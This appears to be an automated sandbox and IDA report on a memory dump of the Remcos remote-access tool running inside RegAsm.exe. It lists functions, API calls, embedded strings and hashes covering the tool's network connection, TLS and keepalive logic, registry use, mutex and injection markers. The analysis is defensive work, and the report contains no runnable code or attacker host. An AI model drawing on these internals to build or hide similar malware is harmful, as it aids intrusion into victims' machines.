license_code.txt, xrefs: 0040EA4D
PG, xrefs: 0040F036
Remcos Agent initialized, xrefs: 0040EFEF
PG, xrefs: 0040EDD3
8SG, xrefs: 0040EF1D
PG, xrefs: 0040ED7B
User, xrefs: 0040F28E
PG, xrefs: 0040F1F3
SG, xrefs: 0040EB05
PG, xrefs: 0040EA5D
PG, xrefs: 0040F187
PG, xrefs: 0040F12B
PG, xrefs: 0040EEAC
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe, xrefs: 0040E9E6, 0040EE0F
8SG, xrefs: 0040EE65
exepath, xrefs: 0040EE92, 0040EF40
dMG, xrefs: 0040F1A8
SG, xrefs: 0040EB62
del, xrefs: 0040F2D1
PG, xrefs: 0040EA96
Administrator, xrefs: 0040F287
Software\, xrefs: 0040EAC3
PG, xrefs: 0040ED47
Access Level: , xrefs: 0040F29F
PG, xrefs: 0040F1C7
PG, xrefs: 0040F103

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
API String ID: 2830904901-1084268468
Opcode ID: eda12cd7c69f934bf8e5de040969580ce553317ac3dc7a95acc81c6d6a3cbbd9
Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
Opcode Fuzzy Hash: eda12cd7c69f934bf8e5de040969580ce553317ac3dc7a95acc81c6d6a3cbbd9
Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

Uniqueness

Uniqueness Score: -1.00%

Function 00414F2A Relevance: 46.3, APIs: 5, Strings: 21, Instructions: 809
sleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
Sleep.KERNEL32(00000000,00000002), ref: 00415AD7

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

8SG, xrefs: 00415340
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe, xrefs: 004153C0
NG, xrefs: 004153E2
PSG, xrefs: 004154FE
dMG, xrefs: 00415499
PG, xrefs: 00415328
4.9.4 Pro, xrefs: 004154CB
%I64u, xrefs: 004152F6
Connected | , xrefs: 0041524E
| , xrefs: 00415112, 00415253
TLS Off, xrefs: 004150E5
hlight, xrefs: 00415393
Connecting | , xrefs: 00415108
NG, xrefs: 00415423
PG, xrefs: 00415A9E
name, xrefs: 00415366
Connection Error: Unable to create socket, xrefs: 004151EA
Disconnected, xrefs: 00415A47
PG, xrefs: 00414F54
TLS On , xrefs: 004150F3
Connection Error: , xrefs: 0041519F

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep$ErrorLastLocalTime
String ID: | $%I64u$4.9.4 Pro$8SG$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
API String ID: 524882891-4102665942
Opcode ID: 73fb06cf3cfe75bdcaf709afde874841665375011feb0d426ca3d32c78fb7904
Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
Opcode Fuzzy Hash: 73fb06cf3cfe75bdcaf709afde874841665375011feb0d426ca3d32c78fb7904
Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00414D86 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
LoadLibraryA.KERNEL32(?), ref: 00414E17
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
FreeLibrary.KERNEL32(00000000), ref: 00414E3E
LoadLibraryA.KERNEL32(?), ref: 00414E76
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
FreeLibrary.KERNEL32(00000000), ref: 00414E8F
GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
FreeLibrary.KERNEL32(00000000), ref: 00414EB5

Strings

getnameinfo, xrefs: 00414DA2
\wship6, xrefs: 00414E5E
getaddrinfo, xrefs: 00414D93, 00414E31, 00414E82
\ws2_32, xrefs: 00414DFF
freeaddrinfo, xrefs: 00414DB2

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeProc$Load$DirectorySystem
String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
API String ID: 2490988753-744132762
Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE

Uniqueness

Uniqueness Score: -1.00%

Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,?), ref: 004048E0
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
WSAGetLastError.WS2_32 ref: 00404A21

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

TLS Error 3, xrefs: 004049D8
Connection Refused, xrefs: 00404A76
TLS Error 2, xrefs: 00404955
TLS Handshake... | , xrefs: 00404904
TLS Authentication Failed, xrefs: 00404999
TLS Error 1, xrefs: 00404937
Connection Failed: , xrefs: 00404A43

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
API String ID: 994465650-2151626615
Opcode ID: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
Opcode Fuzzy Hash: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF

Uniqueness

Uniqueness Score: -1.00%

Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
CloseHandle.KERNEL32(?), ref: 00404E4C
closesocket.WS2_32(000000FF), ref: 00404E5A
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
CloseHandle.KERNEL32(?), ref: 00404EBF
CloseHandle.KERNEL32(?), ref: 00404EC4
SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
CloseHandle.KERNEL32(?), ref: 00404ED6

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$ObjectSingleWait$closesocket
String ID:
API String ID: 3658366068-0
Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLongPathNameW.KERNEL32 ref: 0040DB9A

Strings

UserProfile, xrefs: 0040DB58
\system32, xrefs: 0040DAAE
SystemDrive, xrefs: 0040DA91
AppData, xrefs: 0040DB51
\SysWOW64, xrefs: 0040DB00
ProgramFiles, xrefs: 0040DB6E
WinDir, xrefs: 0040DA9B, 0040DABD, 0040DB0F
Temp, xrefs: 0040DA66
ProgramData, xrefs: 0040DB5F

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-425784914
Opcode ID: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
Opcode Fuzzy Hash: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F

Uniqueness

Uniqueness Score: -1.00%

Function 0044AC49 Relevance: 12.2, APIs: 8, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
__alloca_probe_16.LIBCMT ref: 0044ACDB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
__alloca_probe_16.LIBCMT ref: 0044ADC0
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
__freea.LIBCMT ref: 0044AE30

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

__freea.LIBCMT ref: 0044AE39
__freea.LIBCMT ref: 0044AE5E

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A

Uniqueness

Uniqueness Score: -1.00%

Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8

Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2

StrToIntA.SHLWAPI(00000000), ref: 0041B33C

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0041B2D7, 0041B2E1, 0041B322
(64 bit), xrefs: 0041B368
(32 bit), xrefs: 0041B36F
CurrentBuildNumber, xrefs: 0041B31D
ProductName, xrefs: 0041B2D2

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue
String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 1866151309-2070987746
Opcode ID: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
Opcode Fuzzy Hash: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE

Uniqueness

Uniqueness Score: -1.00%

Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLocalTime.KERNEL32(?), ref: 00404F81
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0

Strings

KeepAlive | Enabled | Timeout: , xrefs: 00404F94

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 2532271599-1507639952
Opcode ID: 27b858f6950e3623d995e23d6d4fe1d77f4f118926dc16c8cee4ff6bd928c013
Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
Opcode Fuzzy Hash: 27b858f6950e3623d995e23d6d4fe1d77f4f118926dc16c8cee4ff6bd928c013
Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA

Uniqueness

Uniqueness Score: -1.00%

Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
RegCloseKey.KERNEL32(?), ref: 004137B1

Strings

pth_unenc, xrefs: 00413773

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc
API String ID: 1818849710-4028850238
Opcode ID: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
Opcode Fuzzy Hash: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
GetLastError.KERNEL32 ref: 0040D083

Strings

SG, xrefs: 0040D069

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID: SG
API String ID: 1925916568-3189917014
Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519

Uniqueness

Uniqueness Score: -1.00%

Function 004135A6 Relevance: 4.5, APIs: 3, Instructions: 44
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
RegQueryValueExA.KERNEL32 ref: 004135E7
RegCloseKey.KERNEL32(?), ref: 004135F2

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00413549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
RegQueryValueExA.KERNEL32 ref: 00413587
RegCloseKey.KERNEL32(?), ref: 00413592

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94

Uniqueness

Uniqueness Score: -1.00%

Function 004134FF Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413516
RegQueryValueExA.KERNEL32 ref: 0041352A
RegCloseKey.KERNEL32(?), ref: 00413535

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4

Uniqueness

Uniqueness Score: -1.00%

Function 00413877 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
RegCloseKey.ADVAPI32(004660A4), ref: 004138AB

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798

Uniqueness

Uniqueness Score: -1.00%

Function 0044EDC4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EDE9

Strings

, xrefs: 0044EE2E

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
Instruction ID: 44bbd8f54034b75cb3f6f6e84f1b5a7d7ac270184ed4e74474e217fcd589b3ab
Opcode Fuzzy Hash: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
Instruction Fuzzy Hash: 74411E705043489AEF218F65CC84AF7BBB9FF45308F2408EEE59A87142D2399E45DF65

Uniqueness

Uniqueness Score: -1.00%

Function 00409DE4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00409DFD

Strings

pQG, xrefs: 00409E2D

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _wcslen
String ID: pQG
API String ID: 176396367-3769108836
Opcode ID: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
Opcode Fuzzy Hash: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00448BB3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448C24

Strings

LCMapStringEx, xrefs: 00448BCE

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
Opcode Fuzzy Hash: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99

Uniqueness

Uniqueness Score: -1.00%

Function 00448A84 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BF4F,-00000020,00000FA0,00000000,00467378,00467378), ref: 00448ACF

Strings

InitializeCriticalSectionEx, xrefs: 00448A9F

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
Instruction ID: 658be74961f29c719de8c28810f5b4ff6aac6a213607643c1e3aaf487ccb6ecc
Opcode Fuzzy Hash: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
Instruction Fuzzy Hash: 12F0E235640208FBCF019F51DC06EAE7F61EF48722F10816AFC096A261DE799D25ABDD

Uniqueness

Uniqueness Score: -1.00%

Function 00448710 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0044874F

Strings

FlsAlloc, xrefs: 0044872B

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
